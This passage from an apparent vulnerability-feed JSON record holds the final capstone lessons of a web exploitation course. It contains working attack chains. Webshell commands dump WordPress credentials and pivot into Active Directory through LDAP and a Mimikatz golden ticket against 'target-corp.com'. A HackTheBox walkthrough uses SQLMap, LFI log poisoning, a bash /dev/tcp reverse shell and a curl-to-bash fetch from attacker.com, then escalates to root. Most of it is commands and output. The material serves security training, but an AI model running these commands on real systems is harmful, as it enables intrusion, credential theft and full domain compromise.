'wp_user');\ndefine('DB_PASSWORD', 'Str0ngDBP@ssw0rd123!');\ndefine('DB_HOST', 'localhost');\n```\n\n**Step 2: Dump WordPress credentials**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=mysql+-uwp_user+-pStr0ngDBP@ssw0rd123!+-Dwordpress+-e+'SELECT+user_login,user_pass+FROM+wp_users;'\"\n```\n\n**Hashes:**\n```\nadmin $P$Bxxxxxxxxxxxxxxxxxxxxxxxxx\neditor $P$Bxxxxxxxxxxxxxxxxxxxxxxxxx\n```\n\n**Step 3: Crack hashes**\n```bash\necho '$P$Bxxxxxxxxxxxxxxxxxxxxxxxxx' > hash.txt\nhashcat -m 400 hash.txt /usr/share/wordlists/rockyou.txt\n# admin:Welcome2023!\n```\n\n### Phase 5: Active Directory Pivot\n\n**Step 1: Enumerate internal network**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=ip+a\"\n# eth0: 10.10.20.5/24 (internal network)\n```\n\n**Step 2: Discover AD server**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=nslookup+dc01.target-corp.local\"\n# 10.10.20.10\n```\n\n**Step 3: LDAP enumeration**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=ldapsearch+-x+-h+10.10.20.10+-b+'DC=target-corp,DC=local'+-D+'wp_user@target-corp.local'+-w'Str0ngDBP@ssw0rd123!'\"\n```\n\n**Step 4: Find domain admin**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=ldapsearch+-x+-h+10.10.20.10+-b+'CN=Domain+Admins,CN=Users,DC=target-corp,DC=local'+-D+'wp_user@target-corp.local'+-w'Str0ngDBP@ssw0rd123!'\"\n```\n\n**Step 6: Golden ticket attack**\n```bash\n# On attacker machine, extract krbtgt hash from DC\n# Then generate golden ticket with Mimikatz\n\nmimikatz # kerberos::golden /user:Administrator /domain:target-corp.local /krbtgt:HASH /sid:S-1-5-21-xxxxx /ptt\nmimikatz # kerberos::tgt\n\n# Now access domain admin resources\n```\n\n**Goal achieved: Domain Admin**\n\n---\n\n## Lesson 37: Capstone 2 \u2014 HackTheBox Photo Blog (SQLi + LFI + RCE)\n\n### Scenario\n\n**Target:** 10.10.11.15 (HackTheBox Photo Blog)\n**Goal:** Get user.txt and root.txt\n**Difficulty:** Medium\n**Tools:** Burp Suite, SQLMap, nmap, linpeas\n\n### Phase 1: Enumeration\n\n**Step 1: nmap scan**\n```bash\nnmap -p 22,80,3000 -sV -oA photo_blog 10.10.11.15\n```\n\n**Results:**\n```\n22/tcp open ssh OpenSSH 8.9\n80/tcp open http Apache 2.4.52\n3000/tcp open http Node.js (Express)\n```\n\n**Step 2: Web enumeration**\n```bash\ncurl -s http://10.10.11.15 | head -50\n# Photo Blog \u2014 Simple Image Hosting\n# Links to /public, /login, /register\n```\n\n**Step 3: Register and login**\n```bash\ncurl -s -X POST http://10.10.11.15/register \\\n -d \"username=test&email=test@test.com&password=test123\"\ncurl -s -X POST http://10.10.11.15/login \\\n -d \"username=test&password=test123\" -c cookies.txt\n```\n\n### Phase 2: SQL Injection (Union-Based)\n\n**Step 1: Find injection point**\n```bash\ncurl -s \"http://10.10.11.15/public?album=1\" | grep -i photo\n# Returns photos from album 1\n```\n\n**Step 2: Test SQLi**\n```bash\ncurl -s \"http://10.10.11.15/public?album=1'+UNION+SELECT+NULL--\"\n# Error: SQL syntax\n```\n\n**Step 3: Use SQLMap**\n```bash\nsqlmap -u \"http://10.10.11.15/public?album=1\" --cookie=cookies.txt --batch --dbs\n```\n\n**Databases found:**\n```\n[*] information_schema\n[*] photo_blog_db\n```\n\n**Step 4: Enumerate tables**\n```bash\nsqlmap -u \"http://10.10.11.15/public?album=1\" --cookie=cookies.txt -D photo_blog_db --tables\n```\n\n**Tables:**\n```\nalerts\nusers\nphotos\n```\n\n**Step 5: Dump users**\n```bash\nsqlmap -u \"http://10.10.11.15/public?album=1\" --cookie=cookies.txt -D photo_blog_db -T users --dump\n```\n\n**Credentials:**\n```\nadmin $2a$12$... (bcrypt hash)\nviewer $2a$12$...\n```\n\n**Step 6: Crack with john**\n```bash\njohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txt\n# admin:password1\n```\n\n### Phase 3: Find LFI via Photo Upload\n\n**Step 1: Explore the application**\n```bash\ncurl -s http://10.10.11.15 -b cookies.txt\n# Find upload functionality: /upload\n```\n\n**Step 2: Upload feature**\n```bash\ncurl -s -X POST http://10.10.11.15/upload -b cookies.txt -F \"image=@test.jpg\"\n# Returns: {\"filename\": \"abc123.jpg\", \"path\": \"/var/www/photos/abc123.jpg\"}\n```\n\n**Step 3: Find LFI**\n```bash\ncurl -s \"http://10.10.11.15/public?album=../../etc/passwd\"\n# Returns /etc/passwd content!\n```\n\n**LFI confirmed in album parameter.**\n\n### Phase 4: LFI to RCE via Log Poisoning\n\n**Step 1: Identify log locations**\n```bash\ncurl -s \"http://10.10.11.15/public?album=../../var/log/apache2/access.log\" | head -20\n# Access log accessible\n```\n\n**Step 2: Inject PHP payload via User-Agent**\n```bash\ncurl -A \"\" http://10.10.11.15/\n```\n\n**Step 3: RCE via LFI**\n```bash\ncurl -s \"http://10.10.11.15/public?album=../../var/log/apache2/access.log&cmd=id\"\n# uid=33(www-data) gid=33(www-data)\n```\n\n**Step 4: Reverse shell**\n```bash\ncurl -s \"http://10.10.11.15/public?album=../../var/log/apache2/access.log&cmd=bash+-i+>%26+/dev/tcp/10.10.14.2/4444+0>%261\"\n```\n\n**On attacker box:**\n```bash\nnc -lvnp 4444\n# Shell received \u2014 user: www-data\n```\n\n### Phase 5: Privilege Escalation\n\n**Step 1: Enumerate with linpeas**\n```bash\n# Download and run linpeas\ncurl -s http://attacker.com/linpeas.sh | bash\n```\n\n**Findings:**\n- SUID: `/usr/bin/node` (misconfigured)\n- Cron job: `/usr/local/scripts/backup.sh` runs as root\n\n**Step 2: GTFO bins \u2014 node SUID**\n```bash\nnode -e \"require('child_process').exec('bash -i')\"\n# Spawns root shell\n```\n\n**Step 3: Or exploit the cron job**\n```bash\n# Check backup.sh\ncurl -s \"http://10.10.11.15/public?album=../../usr/local/scripts/backup.sh\"\n# It copies /var/www to /backup\n# Overwrite with malicious backup\n```\n\n**Step 4: Get root via node**\n```bash\n/usr/bin/node -e \"require('child_process').exec('bash -p')\"\n# uid=0(root)\n```\n\n### Phase 6: Capture Flags\n\n**User flag:**\n```bash\ncat /home/admin/user.txt\n# f4e2c8d1b7a3...\n```\n\n**Root flag:**\n```bash\ncat /root/root.txt\n# 9e8a7b6c5d4e...\n```\n\n---\n\n## Summary Table\n\n| Capstone | Target | Initial Vector | Escalation | Goal |\n|----------|--------|---------------|------------|------|\n| 1 | WordPress + AD | File Manager RCE | sudo systemctl | Domain Admin |\n| 2 | HTB Photo Blog | SQLi + LFI | node SUID | Root |\n\n---\n\n## Key Takeaways\n\n### Attack Chaining\n\n1. **No single exploit wins.** Real compromises chain multiple vulnerabilities.\n2. **Low-privilege is enough.** A plugin RCE \u2192 sudo misconfiguration \u2192 AD is a realistic path.\n3. **LFI is often exploitable.** Log poisoning, session poisoning, or procfs \u2014 always try.\n4. **WordPress is a goldmine.** Plugin vulnerabilities + weak sudo configs = easy root.\n\n### Methodology Summary\n\n```\n1. Recon \u2192 nmap, wpscan, enumerate\n2. Initial Access \u2192 Plugin RCE, SQLi, Auth bypass\n3. Escalate \u2192 sudo, SUID, kernel exploits\n4. Pivot \u2192 Database creds, AD enumeration\n5. Exfiltrate \u2192 Flags, hashes, domain admin\n```\n\n### Common HTB/Web Challenge Patterns\n\n| Pattern | Technique | Example |\n|---------|-----------|---------|\n| SQL injection | UNION, Boolean blind | Photo Blog album parameter |\n| LFI | Log poisoning, procfs | /public?album=../../log |\n| File upload | Polyglot, extension bypass | Image upload \u2192 PHP |\n| Auth bypass | JWT none, weak secret | Cookie manipulation |\n| SSRF | Metadata, internal API | Image URL preview |\n| IDOR | Enumerate IDs | /profile/1 \u2192 /profile/2 |\n\n---\n\n## Final Exercise: Complete the HTB Photo Blog Box\n\n**Objective:** Walk through the complete HTB Photo Blog attack chain independently.\n\n**Steps to complete:**\n1. Enumerate the web application\n2. Register and explore upload functionality\n3. Find SQL injection in album parameter\n4. Dump credentials, crack admin hash\n5. Exploit LFI in album parameter\n6. RCE via log poisoning\n7. Privilege escalate via node SUID\n8. Capture both flags\n\n**Expected deliverable:** A writeup with screenshots and commands for each step.\n\n---\n\n## Quick Reference: CTF/Web Challenge Checklist\n\n```\n\u25a1 Port scan (nmap)\n\u25a1 Web enumeration (curl, dirb, gobuster)\n\u25a1 Technology detection (wappalyzer, whatweb)\n\u25a1 Register account if possible\n\u25a1 Test all parameters for SQLi\n\u25a1 Test all parameters for XSS\n\u25a1 Test all parameters for IDOR\n\u25a1 Test file upload functionality\n\u25a1 Test LFI via all file path parameters\n\u25a1 Check for SSRF in URL parameters\n\u25a1 Enumerate internal services if LFI/SSRF found\n\u25a1 Escalate privileges\n\u25a1 Capture flags\n```\n\n---\n\n**Congratulations!** You've completed the Web Exploitation Course. You now have:\n\n- **Burp Suite mastery** \u2014 Proxy, Repeater, Intruder, Decoder\n- **SQL injection exploitation** \u2014 Union, Boolean, Time-based, SQLMap\n- **XSS attack chain** \u2014 Reflected, Stored, DOM, CSRF\n- **Server-side attacks** \u2014 SSRF, LFI, RFI, XXE, Command Injection\n- **File upload attacks** \u2014 Bypass, webshell, RCE\n- **Authentication attacks** \u2014 JWT, OAuth, session management\n- **WordPress pentesting** \u2014 Enumeration, plugin exploitation, XMLRPC\n- **Real-world attack chains** \u2014 WordPress \u2192 Domain Admin, SQLi \u2192 LFI \u2192 Root\n\n**Next steps:**\n- Practice on PortSwigger Web Security Academy (free)\n- Complete HackTheBox web challenges\n- Participate in bug bounty programs\n- Study OWASP Top 10 in depth\n\n---\n\n## Final Summary Table\n\n| Module | Lessons | Key Techniques | Tools |\n|--------|---------|---------------|-------|\n| 1 | 1-5 | Burp Suite, HTTP, Recon, Methodology | Burp, nmap, wpscan |\n| 2 | 6-10 | SQLi (Union, Boolean, Time) | SQLMap, Burp |\n| 3 | 11-15 | XSS (Reflected, Stored, DOM), CSRF | Burp, XSS vectors |\n| 4 | 16-20 | SSRF, Path Traversal, LFI, RFI, XXE | Burp, curl |\n| 5 | 21-25 | Command Injection, File Upload, IDOR | Burp, webshells |\n| 6 | 26-30 | Auth flaws, JWT attacks, OAuth | jwt_tool, Burp |\n| 7 | 31-35 | WordPress (Plugins, Themes, Auth) | wpscan, XMLRPC |\n| 8 | 36-37 | Full attack chains, CTF walkthroughs | All tools |\n\n---\n\n**End of Web Exploitation Course**\n\n\n", "creation_timestamp": "2026-06-14T04:23:47.000000Z"}, {"uuid": "e14b0b37-f87d-4bd6-a06d-1472d1965208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "Telegram/oFANvhI-6gD5N3MdJioXISYRmmtnWIQ07Tw4W0tvnq7rKmo", "content": "", "creation_timestamp": "2026-06-02T21:00:04.000000Z"}]}